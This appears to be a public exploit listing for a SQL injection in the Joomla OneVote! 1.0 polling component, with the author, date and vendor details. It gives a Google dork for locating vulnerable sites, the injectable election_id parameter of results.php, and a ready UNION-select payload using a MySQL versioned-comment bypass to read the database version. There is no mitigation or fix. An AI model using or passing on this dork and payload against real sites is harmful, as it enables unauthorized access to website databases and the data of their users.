18 lines
No EOL
672 B
Text
18 lines
No EOL
672 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_onevote
|
|
# Date: 27.02.2017
|
|
# Vendor Homepage: http://advcomsys.com/
|
|
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
|
|
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
|
|
# Version: 1.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
|
|
# +/*!50000union*/+select+@@version-- -
|
|
# # # # # |